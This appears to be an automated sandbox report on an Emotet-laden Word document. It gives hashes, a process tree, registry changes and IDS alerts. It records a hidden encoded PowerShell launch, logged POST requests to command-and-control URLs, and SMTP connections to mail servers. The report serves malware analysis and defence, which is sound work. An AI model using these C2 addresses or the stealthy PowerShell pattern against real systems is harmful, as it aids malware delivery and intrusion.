File name: X.doc

Full analysis: https://app.any.run/tasks/e73929a0-590e-465c-aba9-544f799acadf
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: December 07, 2019, 00:19:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, emotet-doc, emotet, generated-doc, trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Quia rem et., Author: Deniz Benninger, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 5 17:53:00 2019, Last Saved Time/Date: Thu Dec 5 17:53:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 337, Security: 0
MD5: 6F667CFF32EC075F0FBDB33EF6CD2016
SHA1: 4ABC63E3FAF07810397873811F7D093F801C786E
SHA256: 77094CD1BD3D8D429AD652583B4CDB2A101608AE698729BFFBA8468B0BAC06E6
SSDEEP: 6144:sWwmP3WbeJzUO62k4qtGiL3HJkWyD7b1bvDT:sWwmP3WbeJzUO6bQitkB7bB7T

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 493.exe (PID: 3772)
      • 493.exe (PID: 2428)
      • serialfunc.exe (PID: 3976)
      • serialfunc.exe (PID: 3628)
    • Emotet process was detected

      • 493.exe (PID: 2428)
    • EMOTET was detected

      • serialfunc.exe (PID: 3628)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 3628)
    • Connects to CnC server

      • serialfunc.exe (PID: 3628)
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3792)
    • Creates files in the user directory

      • powershell.exe (PID: 3792)
    • PowerShell script executed

      • powershell.exe (PID: 3792)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3792)
      • 493.exe (PID: 2428)
    • Application launched itself

      • 493.exe (PID: 3772)
    • Starts itself from another location

      • 493.exe (PID: 2428)
    • Connects to unusual port

      • serialfunc.exe (PID: 3628)
    • Connects to SMTP port

      • serialfunc.exe (PID: 3628)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 640)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 640)
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Quia rem et.
Subject: -
Author: Deniz Benninger
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:12:05 17:53:00
ModifyDate: 2019:12:05 17:53:00
Pages: 1
Words: 58
Characters: 337
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 2
Paragraphs: 1
CharCountWithSpaces: 394
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
Total processes: 42
Monitored processes: 6
Malicious processes: 5
Suspicious processes: 0

Behavior graph

winword.exe (no specs)
  -> start: powershell.exe
    -> drop and start: 493.exe (no specs)
      -> 493.exe (#EMOTET)
        -> drop and start: serialfunc.exe (no specs)
          -> serialfunc.exe (#EMOTET)

Process information

PID: 640
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\X.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
PID: 2428
CMD: --956a31ec
Path: C:\Users\admin\493.exe
Parent process: 493.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\493.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
PID: 3628
CMD: --d6864438
Path: C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
Parent process: serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\appdata\local\serialfunc\serialfunc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
PID: 3772
CMD: "C:\Users\admin\493.exe"
Path: C:\Users\admin\493.exe
Parent process: powershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\493.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
PID: 3792
CMD: powershell -w hidden -en [base64-encoded command blob omitted]
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 3976
CMD: "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"
Path: C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
Parent process: 493.exe
User:
admin
Integrity Level:
MEDIUM
Description:
OPENGL MFC Application
Exit code:
0
Version:
1, 0, 0, 1
Modules
Images
c:\users\admin\appdata\local\serialfunc\serialfunc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
Total events: 2 281
Read events: 1 448
Write events: 707
Delete events: 126

Modification events

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: i1;
Value: 69313B0080020000010000000000000000000000

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: Off

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1041
Value: Off

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1046
Value: Off

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1036
Value: Off

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1031
Value: Off

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1040
Value: Off

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1049
Value: Off

(PID) Process: (640) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 3082
Value: Off

(PID) Process: (640) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: WORDFiles
Value: 1334247486
Executable files: 2
Suspicious files: 2
Text files: 0
Unknown types: 7

Dropped files

PID | Process     | Filename
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA969.tmp.cvr
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0B5C21B.wmf
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\59349D60.wmf
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCC03DE1.wmf
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D963CA6E.wmf
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\91771B97.wmf
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89C990AC.wmf
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6FACE0BD.wmf
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FC7B79A.wmf
640 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FE55AED3.wmf
HTTP(S) requests: 15
TCP/UDP connections: 434
DNS requests: 281
Threats: 161

HTTP requests

PID  | Process        | Method | HTTP Code | IP                   | URL                                              | CN      | Type   | Size    | Reputation
3628 | serialfunc.exe | POST   | 200       | 92.119.123.10:8080   | http://92.119.123.10:8080/j09g7BH5rzItV          | unknown | binary | 138 Kb  | malicious
3628 | serialfunc.exe | POST   | 200       | 172.90.70.168:443    | http://172.90.70.168:443/zDwi5Ybu                | US      | binary | 1.38 Mb | malicious
3628 | serialfunc.exe | POST   | 200       | 149.202.153.251:8080 | http://149.202.153.251:8080/E8PGmm               | FR      | binary | 684 Kb  | malicious
3628 | serialfunc.exe | POST   | -         | 92.119.123.10:8080   | http://92.119.123.10:8080/AJ506QCvsmuDbNpYI      | unknown | -      | -       | malicious
3628 | serialfunc.exe | POST   | 200       | 92.119.123.10:8080   | http://92.119.123.10:8080/LXJBRyrvnrWp           | unknown | binary | 148 b   | malicious
-    | -              | POST   | -         | 82.145.43.153:8080   | http://82.145.43.153:8080/rpCJ                   | GB      | -      | -       | malicious
3628 | serialfunc.exe | POST   | -         | 149.202.153.251:8080 | http://149.202.153.251:8080/ytjng9cd4nAwLkpoU    | FR      | -      | -       | malicious
3628 | serialfunc.exe | POST   | 200       | 92.119.123.10:8080   | http://92.119.123.10:8080/XqZiK                  | unknown | binary | 138 Kb  | malicious
3628 | serialfunc.exe | POST   | -         | 149.202.153.251:8080 | http://149.202.153.251:8080/JfWBPbVrcaPutvmU     | FR      | -      | -       | malicious
3628 | serialfunc.exe | POST   | 200       | 82.145.43.153:8080   | http://82.145.43.153:8080/MCbD8G5                | GB      | binary | 684 Kb  | malicious

Connections

PID  | Process        | IP                   | Domain                | ASN                                                    | CN | Reputation
3628 | serialfunc.exe | 172.90.70.168:443    | -                     | Time Warner Cable Internet LLC                         | US | malicious
3792 | powershell.exe | 18.212.128.71:443    | haber.rankhigh.ca     | -                                                      | US | unknown
3628 | serialfunc.exe | 148.81.188.196:465   | poczta.vizja.pl       | Naukowa I Akademicka Siec Komputerowa Instytut Badawczy | PL | unknown
3628 | serialfunc.exe | 92.119.123.10:8080   | -                     | -                                                      | -  | malicious
3628 | serialfunc.exe | 199.79.63.31:465     | mail.expervia.in      | PDR                                                    | US | suspicious
3628 | serialfunc.exe | 195.201.105.237:587  | mail.gmsworldwide.com | Awanti Ltd.                                            | RU | unknown
3628 | serialfunc.exe | 212.227.15.177:587   | pop.1und1.com         | 1&1 Internet SE                                        | DE | unknown
3628 | serialfunc.exe | 197.221.1.10:25      | mail.hyundaiodn.co.za | HETZNER                                                | ZA | unknown
3628 | serialfunc.exe | 79.124.90.37:587     | mail.website.bg       | Telepoint Ltd                                          | BG | unknown
3628 | serialfunc.exe | 82.57.200.129:587    | in.alice.it           | Telecom Italia                                         | IT | unknown

DNS requests

Domain                | IP                                                | Reputation
haber.rankhigh.ca     | 18.212.128.71                                     | unknown
pop.bizmail.yahoo.com | 188.125.73.25, 217.146.190.246, 217.146.190.238   | shared
mail.hyundaiodn.co.za | 197.221.1.10                                      | unknown
poczta.vizja.pl       | 148.81.188.196                                    | unknown
mail.website.bg       | 79.124.90.37                                      | unknown
mail.expervia.in      | 199.79.63.31                                      | suspicious
imap.1und1.de         | 212.227.15.171, 212.227.15.188                    | shared
pop.capeletting.com   | 188.40.0.100                                      | unknown
imap.gmail.com        | 64.233.167.108, 64.233.167.109                    | shared
mail.gmsworldwide.com | 195.201.105.237                                   | unknown

Threats

PID  | Process        | Class                         | Message
3628 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5
3628 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6
3628 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3628 | serialfunc.exe | Potentially Bad Traffic       | ET POLICY HTTP traffic on port 443 (POST)
3628 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3628 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3628 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5
3628 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6
3628 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
3628 | serialfunc.exe | Potentially Bad Traffic       | ET POLICY HTTP traffic on port 443 (POST)
No debug info